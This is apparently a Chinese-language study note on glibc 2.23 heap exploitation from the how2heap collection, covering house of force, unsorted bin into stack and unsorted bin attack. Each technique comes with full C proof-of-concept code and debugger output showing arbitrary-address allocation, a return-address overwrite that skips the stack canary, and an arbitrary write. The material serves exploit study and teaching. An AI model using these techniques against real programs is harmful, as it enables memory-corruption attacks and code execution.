How2heap学习笔记-5

house of force

glibc2.23
通过修改top chunk的size位及malloc相应大小达到申请到目标地址空间的目的

示例代码

/*

   This PoC works also with ASLR enabled.
   It will overwrite a GOT entry so in order to apply exactly this technique RELRO must be disabled.
   If RELRO is enabled you can always try to return a chunk on the stack as proposed in Malloc Des Maleficarum 
   ( http://phrack.org/issues/66/10.html )

   Tested in Ubuntu 14.04, 64bit, Ubuntu 18.04

*/


#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
#include <assert.h>

char bss_var[] = "This is a string that we want to overwrite.";

int main(int argc , char* argv[])
{
	fprintf(stderr, "\nWelcome to the House of Force\n\n");
	fprintf(stderr, "The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n");
	fprintf(stderr, "The top chunk is a special chunk. Is the last in memory "
		"and is the chunk that will be resized when malloc asks for more space from the os.\n");

	fprintf(stderr, "\nIn the end, we will use this to overwrite a variable at %p.\n", bss_var);
	fprintf(stderr, "Its current value is: %s\n", bss_var);



	fprintf(stderr, "\nLet's allocate the first chunk, taking space from the wilderness.\n");
	intptr_t *p1 = malloc(256);
	fprintf(stderr, "The chunk of 256 bytes has been allocated at %p.\n", p1 - 2);

	fprintf(stderr, "\nNow the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.\n");
	int real_size = malloc_usable_size(p1);
	fprintf(stderr, "Real size (aligned and all that jazz) of our allocated chunk is %ld.\n", real_size + sizeof(long)*2);

	fprintf(stderr, "\nNow let's emulate a vulnerability that can overwrite the header of the Top Chunk\n");

	//----- VULNERABILITY ----
	intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size - sizeof(long));
	fprintf(stderr, "\nThe top chunk starts at %p\n", ptr_top);

	fprintf(stderr, "\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n");
	fprintf(stderr, "Old size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
	*(intptr_t *)((char *)ptr_top + sizeof(long)) = -1;
	fprintf(stderr, "New size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
	//------------------------

	fprintf(stderr, "\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n"
	   "Next, we will allocate a chunk that will get us right up against the desired region (with an integer\n"
	   "overflow) and will then be able to allocate a chunk right over the desired region.\n");

	/*
	 * The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
	 * new_top = old_top + nb
	 * nb = new_top - old_top
	 * req + 2sizeof(long) = new_top - old_top
	 * req = new_top - old_top - 2sizeof(long)
	 * req = dest - 2sizeof(long) - old_top - 2sizeof(long)
	 * req = dest - old_top - 4*sizeof(long)
	 */
	unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;
	fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n"
	   "we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
	void *new_ptr = malloc(evil_size);
	fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr - sizeof(long)*2);

	void* ctr_chunk = malloc(100);
	fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer.\n");
	fprintf(stderr, "malloc(100) => %p!\n", ctr_chunk);
	fprintf(stderr, "Now, we can finally overwrite that value:\n");

	fprintf(stderr, "... old string: %s\n", bss_var);
	fprintf(stderr, "... doing strcpy overwrite with \"YEAH!!!\"...\n");
	strcpy(ctr_chunk, "YEAH!!!");
	fprintf(stderr, "... new string: %s\n", bss_var);

	assert(ctr_chunk == bss_var);


	// some further discussion:
	//fprintf(stderr, "This controlled malloc will be called with a size parameter of evil_size = malloc_got_address - 8 - p2_guessed\n\n");
	//fprintf(stderr, "This because the main_arena->top pointer is setted to current av->top + malloc_size "
	//	"and we \nwant to set this result to the address of malloc_got_address-8\n\n");
	//fprintf(stderr, "In order to do this we have malloc_got_address-8 = p2_guessed + evil_size\n\n");
	//fprintf(stderr, "The av->top after this big malloc will be setted in this way to malloc_got_address-8\n\n");
	//fprintf(stderr, "After that a new call to malloc will return av->top+8 ( +8 bytes for the header ),"
	//	"\nand basically return a chunk at (malloc_got_address-8)+8 = malloc_got_address\n\n");

	//fprintf(stderr, "The large chunk with evil_size has been allocated here 0x%08x\n",p2);
	//fprintf(stderr, "The main_arena value av->top has been setted to malloc_got_address-8=0x%08x\n",malloc_got_address);

	//fprintf(stderr, "This last malloc will be served from the remainder code and will return the av->top+8 injected before\n");
}

分析

先申请一个堆

• malloc(0x100)

位于0x602080的字符串为This is a string that we want to overwrite.

接下来假设存在一个漏洞修改了top chunk的size为0xffffffffffffffff(-1)

计算当前top chunk与目标地址的偏移：dest - old_top - 4*sizeof(long)
推导过程如下

* The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
* new_top = old_top + nb
* nb = new_top - old_top
* req + 2sizeof(long) = new_top - old_top
* req = new_top - old_top - 2sizeof(long)
* req = dest - 2sizeof(long) - old_top - 2sizeof(long)
* req = dest - old_top - 4*sizeof(long)

在本例中top chunk位于0x603110，希望申请到的空间地址为0x602080，相应申请的空间大小为0x602080-0x603110-4*0x8=0xffffffffffffef50（unsigned long）

• malloc(0xffffffffffffef50)

可以看到这时top chunk被更新，位于0x602070

0x7ffff7dd1b70 <main_arena+80>:	0x0000000000000000	0x0000000000602070 --> top chunk
0x7ffff7dd1b80 <main_arena+96>:	0x0000000000000000	0x00007ffff7dd1b78

接下来再申请一个适当大小的堆，就能控制地址0x602080处的字符串了

• malloc(100)

  Now, the next chunk we overwrite will point at our target buffer.
  malloc(100) => 0x602080!

补充

从top chunk分割空间的代码

1. 分割之后的大小需要>=chunk的MINSIZE
2. 修改top chunk的size为-1，即0xffffffffffffffff可以满足判断条件（比较时会把size转换为无符号数）
3. 由于top chunk相应数据的更新和set_head，区域附近的数据会被改变

   // 获取当前的top chunk，并计算其对应的大小
   victim = av->top;
   size   = chunksize(victim);
   // 如果在分割之后，其大小仍然满足 chunk 的最小大小，那么就可以直接进行分割。
   if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) 
   {
       remainder_size = size - nb;
       remainder      = chunk_at_offset(victim, nb);
       av->top        = remainder;
       set_head(victim, nb | PREV_INUSE |
               (av != &main_arena ? NON_MAIN_ARENA : 0));
       set_head(remainder, remainder_size | PREV_INUSE);
   
       check_malloced_chunk(av, victim, nb);
       void *p = chunk2mem(victim);
       alloc_perturb(p, bytes);
       return p;
   }
   
   #define chunk_at_offset(p, s) ((mchunkptr)(((char *) (p)) + (s)))

unsorted bin into stack

glibc2.23
利用修改unosrted bin的size和bk，并布置fake chunk的size和bk，申请到位于栈上的fake chunk

示例代码

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <assert.h>

void jackpot(){ printf("Nice jump d00d\n"); exit(0); }

int main() {
	intptr_t stack_buffer[4] = {0};

	printf("Allocating the victim chunk\n");
	intptr_t* victim = malloc(0x100);

	printf("Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
	intptr_t* p1 = malloc(0x100);

	printf("Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
	free(victim);

	printf("Create a fake chunk on the stack");
	printf("Set size for next allocation and the bk pointer to any writable address");
	stack_buffer[1] = 0x100 + 0x10;
	stack_buffer[3] = (intptr_t)stack_buffer;

	//------------VULNERABILITY-----------
	printf("Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
	printf("Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
	victim[-1] = 32;
	victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
	//------------------------------------

	printf("Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
	char *p2 = malloc(0x100);
	printf("malloc(0x100): %p\n", p2);

	intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
	memcpy((p2+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary

	assert((long)__builtin_return_address(0) == (long)jackpot);
}

分析

申请两个堆

• malloc(0x100)（victim）
• malloc(0x100)（barrier）

释放victim

• free(victim)

在栈上布置好数据
size位布置为0x110
bk指针指向任意可写地址，例中指向栈上的fake chunk，&size-0x8

假设存在漏洞修改了unsorted bin的size为0x20（要求如下）
bk指针指向栈上的fake chunk
Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem

此时unosrted bin结构BK: 0x602410 —▸ 0x7fffffffdc80 ◂— 0x7fffffffdc80
再申请一个大小为0x100的堆

• malloc(0x100)

首先找到victim，发现size不符合，于是找到栈上的fake chunk，发现大小符合
于是申请到栈上的空间
malloc(0x100): 0x7fffffffdc90

unsorted bin attack

glibc 2.23
实现修改任意地址值为一个较大的数值。

原理

当将一个unsorted bin取出时，会将bck->fd的位置写入本unsorted bin的位置

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
	malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

也就是说如果能控制unsorted bin的bk指针，就能把unsorted_chunks (av)写到任意地址

示例代码

#include <stdio.h>
#include <stdlib.h>

int main(){
	fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
	fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
		   "global variable global_max_fast in libc for further fastbin attack\n\n");

	unsigned long stack_var=0;
	fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
	fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);

	unsigned long *p=malloc(400);
	fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
	fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
           "the first one during the free()\n\n");
	malloc(500);

	free(p);
	fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
		   "point to %p\n",(void*)p[1]);

	//------------VULNERABILITY-----------

	p[1]=(unsigned long)(&stack_var-2);
	fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
	fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

	//------------------------------------

	malloc(400);
	fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
		   "rewritten:\n");
	fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

分析

申请两个堆

• malloc(400)
• malloc(500)

把chunk 1释放掉，chunk 1被放入unsorted bin中

• free(chunk 1)

想要改写的数字位于栈上：0x7fffffffdca8
假设能够改写空闲状态的chunk1的bk指针，修改其为0x7fffffffdc98
这时申请相应大小的堆

• malloc(400)

程序就会到unsorted bin中找到chunk 1
按照代码其中会有一处判断，如果：

1. 申请的chunk大小处于small bin
2. last reminder是unsorted bin的唯一一个chunk
3. 切割后的chunk大小大于MINSIZE
   则优先使用这个块，进行相应的操作。
   不过本例中由于先前修改了bk，此时按照bk索引不止一个chunk
   BK: 0x602000 —▸ 0x7fffffffdc98 —▸ 0x602010 ◂— 0x0,则不会通过该判断

   if (in_smallbin_range(nb) && bck == unsorted_chunks(av) &&
                   victim == av->last_remainder &&
                   (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) {
                   ....
               }	

   而是继续执行

   unsorted_chunks(av)->bk = bck;
   bck->fd = unsorted_chunks(av);

于是位于栈上0x7fffffffdca8就被修改为了unsorted_chunks(av)，即0x7ffff7dd1b78

pwndbg> x/gx 0x7fffffffdca8
0x7fffffffdca8:	0x00007ffff7dd1b78